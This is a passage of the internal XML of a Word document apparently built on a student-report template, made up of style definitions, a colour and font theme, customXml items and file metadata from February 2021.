    <w:rsid w:val="004C7F2B"/>
    <w:rsid w:val="004D11C1"/>
    <w:rsid w:val="004D6526"/>
    <w:rsid w:val="005120A6"/>
    <w:rsid w:val="005276A8"/>
    <w:rsid w:val="00537DAC"/>
    <w:rsid w:val="005A0F07"/>
    <w:rsid w:val="005D1328"/>
    <w:rsid w:val="005D4907"/>
    <w:rsid w:val="00630312"/>
    <w:rsid w:val="00667CD7"/>
    <w:rsid w:val="006748DB"/>
    <w:rsid w:val="00680902"/>
    <w:rsid w:val="006A13EC"/>
    <w:rsid w:val="006C60E6"/>
    <w:rsid w:val="006D1BE2"/>
    <w:rsid w:val="007021F0"/>
    <w:rsid w:val="00715806"/>
    <w:rsid w:val="00764661"/>
    <w:rsid w:val="007D0171"/>
    <w:rsid w:val="007D2FD3"/>
    <w:rsid w:val="007F4713"/>
    <w:rsid w:val="0081410C"/>
    <w:rsid w:val="00815D34"/>
    <w:rsid w:val="00834654"/>
    <w:rsid w:val="00856259"/>
    <w:rsid w:val="008579D6"/>
    <w:rsid w:val="00872054"/>
    <w:rsid w:val="008822EB"/>
    <w:rsid w:val="008A38B9"/>
    <w:rsid w:val="008A5F4C"/>
    <w:rsid w:val="008B6D5B"/>
    <w:rsid w:val="00907C61"/>
    <w:rsid w:val="00952F7D"/>
    <w:rsid w:val="00957B8D"/>
    <w:rsid w:val="00984B08"/>
    <w:rsid w:val="009E3B7D"/>
    <w:rsid w:val="009E3B85"/>
    <w:rsid w:val="009F30FD"/>
    <w:rsid w:val="009F46CB"/>
    <w:rsid w:val="00A32309"/>
    <w:rsid w:val="00A45A59"/>
    <w:rsid w:val="00A45BDD"/>
    <w:rsid w:val="00A6381B"/>
    <w:rsid w:val="00A66D47"/>
    <w:rsid w:val="00A76F40"/>
    <w:rsid w:val="00A81AC6"/>
    <w:rsid w:val="00A82D92"/>
    <w:rsid w:val="00A83EF7"/>
    <w:rsid w:val="00A952F2"/>
    <w:rsid w:val="00AA7317"/>
    <w:rsid w:val="00AD5018"/>
    <w:rsid w:val="00AD50A7"/>
    <w:rsid w:val="00B04B29"/>
    <w:rsid w:val="00B73721"/>
    <w:rsid w:val="00B864BA"/>
    <w:rsid w:val="00BE02BB"/>
    <w:rsid w:val="00C10754"/>
    <w:rsid w:val="00C3602D"/>
    <w:rsid w:val="00CA57FA"/>
    <w:rsid w:val="00CE0CFE"/>
    <w:rsid w:val="00D00ED1"/>
    <w:rsid w:val="00D47184"/>
    <w:rsid w:val="00D5031E"/>
    <w:rsid w:val="00D62CAD"/>
    <w:rsid w:val="00D64ACC"/>
    <w:rsid w:val="00D85677"/>
    <w:rsid w:val="00E1017C"/>
    <w:rsid w:val="00E34B94"/>
    <w:rsid w:val="00E8561E"/>
    <w:rsid w:val="00EA0FE0"/>
    <w:rsid w:val="00EA759D"/>
    <w:rsid w:val="00ED38DD"/>
    <w:rsid w:val="00F00CEE"/>
    <w:rsid w:val="00F07EF3"/>
    <w:rsid w:val="00F80137"/>
    <w:rsid w:val="00FB7D7B"/>
    <w:rsid w:val="00FC5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44296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173543"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Heading3"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:qFormat/>
    <w:rsid w:val="00537DAC"/>
    <w:pPr>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Heading3"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00537DAC"/>
    <w:pPr>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="EED0C6" w:themeColor="accent3"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00F00CEE"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="24344E" w:themeColor="accent1"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="3"/>
    <w:qFormat/>
    <w:rsid w:val="00F00CEE"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="24344E" w:themeColor="accent1"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:uiPriority w:val="4"/>
    <w:qFormat/>
    <w:rsid w:val="00A45BDD"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:ind w:right="284"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:i/>
      <w:color w:val="24344E" w:themeColor="accent1"/>
      <w:sz w:val="6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5276A8"/>
    <w:rPr>
      <w:sz w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="005276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0CEE"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00527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537DAC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="24344E" w:themeColor="accent1"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00537DAC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="EED0C6" w:themeColor="accent3"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="2"/>
    <w:rsid w:val="00F00CEE"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="24344E" w:themeColor="accent1"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Text">
    <w:name w:val="Text"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="5"/>
    <w:qFormat/>
    <w:rsid w:val="00F00CEE"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="3"/>
    <w:rsid w:val="00F00CEE"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="24344E" w:themeColor="accent1"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="0006271E"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00F00CEE"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="0006271E"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Rockwell" w:hAnsi="Rockwell"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00F00CEE"/>
    <w:rPr>
      <w:rFonts w:ascii="Rockwell" w:hAnsi="Rockwell"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="0006271E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="4"/>
    <w:rsid w:val="00A45BDD"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:i/>
      <w:color w:val="24344E" w:themeColor="accent1"/>
      <w:sz w:val="68"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:uiPriority w:val="6"/>
    <w:qFormat/>
    <w:rsid w:val="00F00CEE"/>
    <w:pPr>
      <w:spacing w:before="480" w:after="480"/>
      <w:ind w:left="1134" w:right="1134"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="24344E" w:themeColor="accent1"/>
      <w:sz w:val="80"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="6"/>
    <w:rsid w:val="00F00CEE"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="24344E" w:themeColor="accent1"/>
      <w:sz w:val="80"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PlaceholderText">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00F00CEE"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00537DAC"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="24344E" w:themeColor="accent1"/>
      <w:sz w:val="80"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00537DAC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="24344E" w:themeColor="accent1"/>
      <w:sz w:val="80"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="IntroductionText">
    <w:name w:val="Introduction Text"/>
    <w:basedOn w:val="Heading4"/>
    <w:uiPriority w:val="7"/>
    <w:qFormat/>
    <w:rsid w:val="00537DAC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="00537DAC"/>
    <w:rPr>
      <w:i/>
      <w:sz w:val="42"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Subtitle"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="00537DAC"/>
    <w:rPr>
      <w:i/>
      <w:sz w:val="42"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="009E3B85"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009E3B85"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TitlePage-Version">
    <w:name w:val="Title Page - Version"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00D00ED1"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:i/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D00ED1"/>
    <w:pPr>
      <w:spacing w:before="240" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="1B263A" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00D00ED1"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:ind w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="003A4D7B"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:qFormat/>
    <w:rsid w:val="00E34B94"/>
    <w:pPr>
      <w:spacing w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="5E5E5E" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofFigures">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="008822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866229">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1415127913">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="165684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finsmes.com/2018/02/hack-capital-raises-750k-in-seed-funding.html"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y\AppData\Roaming\Microsoft\Templates\Classic%20student%20report.dotx" TargetMode="External"/></Relationships>
</file>

<file path=word/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="CSR">
  <a:themeElements>
    <a:clrScheme name="CSR">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="5E5E5E"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="D6D5D5"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="24344E"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="DEECEC"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="EED0C6"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="EE6B69"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="E2A1A1"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="EFC5C5"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0000FF"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="FF00FF"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Rockwell - Georgia">
      <a:majorFont>
        <a:latin typeface="Rockwell"/>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DE96D119-E5AC-D14F-93E7-58C331D3EE59}" vid="{D914C8BE-7F8A-A14E-904C-51198F26D0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E6E14A6-9BF9-4BA9-A90A-5D24EDD49C71}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{473E1B92-02B3-4FC3-8DE4-FAE462CE316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CAC1FA21-0704-45B8-A2C2-B71E5CB0EF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B5A5C6-D5B3-4652-97B3-821400C60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 report.dotx</Template>
  <TotalTime>0</TotalTime>
  <Pages>16</Pages>
  <Words>2643</Words>
  <Characters>15068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2021-02-19T13:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-02-22T13:07:00Z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